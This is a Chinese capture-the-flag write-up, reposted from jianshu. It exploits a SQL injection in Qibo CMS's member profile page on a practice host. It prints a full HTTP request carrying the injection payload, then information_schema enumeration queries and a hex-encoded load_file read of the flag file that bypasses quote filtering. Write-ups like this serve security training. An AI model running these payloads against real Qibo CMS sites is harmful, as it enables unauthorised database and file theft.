- 搜索最下面的备号发现是齐博cms
- 查找齐博cms的漏洞。匹配各种目录的存在否,发现/member/userinfo.php SQL注入漏洞 可能有效。
- http://www.anquan.us/static/bugs/wooyun-2014-080259.html这个连接有详细过程
- 翻到最后,根据漏洞在burpsuite构造payload
POST /member/userinfo.php?job=edit&step=2 HTTP/1.1
Host: 1224ac9227f345b59cb0131a09721df592d05799f2094c85.changame.ichunqiu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://1224ac9227f345b59cb0131a09721df592d05799f2094c85.changame.ichunqiu.com/member/homepage.php?uid=3
Content-Type: application/x-www-form-urlencoded
Content-Length: 267
Connection: close
Cookie: USR=m56znlt5%0923%091559486775%09http%3A%2F%2F1224ac9227f345b59cb0131a09721df592d05799f2094c85.changame.ichunqiu.com%2Fmember%2Fhomepage.php%3Fuid%3D4; __jsluid=7d7f069fe967182647342ec73e505d82; passport=3%09admin1%09AwUEAFFQUQMBVwQGXlUBUV0DAA8OW1VVBQxUAgFaV1M%3D57f744ae5a
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
truename=xxxx%0000&Limitword[000]=&[email protected]&provinceid= , address=(select database() ) where uid = 3 %23
- 注意构造漏洞的时候一定要替换成自己的注册东西。
-
最后发现成功爆出数据库blog.
图片.png - 用sql笔记中的内容继续构造,但是发现后面居然过滤',"等,加上了\号。
- 既然第一个数据库都可爆出来,那么绕过就很简单啊。
- 让= 后面替换成查找语句就行了。例如
select group_concat(table_name) from information_schema.tables where table_schema=(select table_schema from information_schema.tables group by table_schema limit 1,1 )
- 一直查到最后,发现没有什么flag。最后看wp发现flag在var/www/html/里面用sql注入文件查找弄出来
- 即select load_file('/var/www/html/flag.php'),但是因为'号被过滤所以要用ASCII HEX的方式了。select load_file(0x2f7661722f7777772f68746d6c2f666c61672e706870)
- 因为查出来的php文件,而不是html文件,不会在页面显示,所以去查看源码。
-
得到flag
图片.png
转载于:https://www.jianshu.com/p/0ac84b411eb6